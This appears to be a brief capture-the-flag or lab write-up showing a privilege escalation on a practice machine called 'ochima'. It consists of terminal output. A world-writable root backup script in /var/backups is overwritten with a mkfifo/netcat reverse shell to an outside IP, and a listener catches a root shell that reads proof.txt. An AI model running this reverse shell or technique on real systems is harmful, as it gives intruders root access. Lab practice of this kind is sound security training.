Priv Esc
snort@ochima:~$ tar xzf etc_backup.tar
gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
Last updated
snort@ochima:~$ tar xzf etc_backup.tar
gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
Last updated
snort@ochima:~$ ls -la /var/backups/
total 836
drwxr-xr-x 2 root root 4096 Oct 23 15:42 .
drwxr-xr-x 14 root root 4096 Dec 11 2023 ..
-rw-r--r-- 1 root root 61440 Oct 23 14:57 alternatives.tar.0
-rw-r--r-- 1 root root 40970 Dec 11 2023 apt.extended_states.0
-rw-r--r-- 1 root root 4438 Dec 11 2023 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3940 Oct 31 2023 apt.extended_states.2.gz
-rw-r--r-- 1 root root 0 Oct 23 14:57 dpkg.arch.0
-rw-r--r-- 1 root root 268 Jun 15 2022 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Dec 11 2023 dpkg.statoverride.0
-rw-r--r-- 1 root root 716144 Dec 11 2023 dpkg.status.0
-rwxrwxrwx 1 root root 54 Dec 11 2023 etc_Backup.sh
snort@ochima:~$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.178 8338 >/tmp/f" > /var/backups/etc_Backup.sh❯ nc -lnvp 8338
listening on [any] 8338 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.181.32] 51450
sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/proof.txt && ip addr
a6adc37be925ccc4b3403d0f47a79879
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:8f:20 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.181.32/24 brd 192.168.181.255 scope global ens160
valid_lft forever preferred_lft forever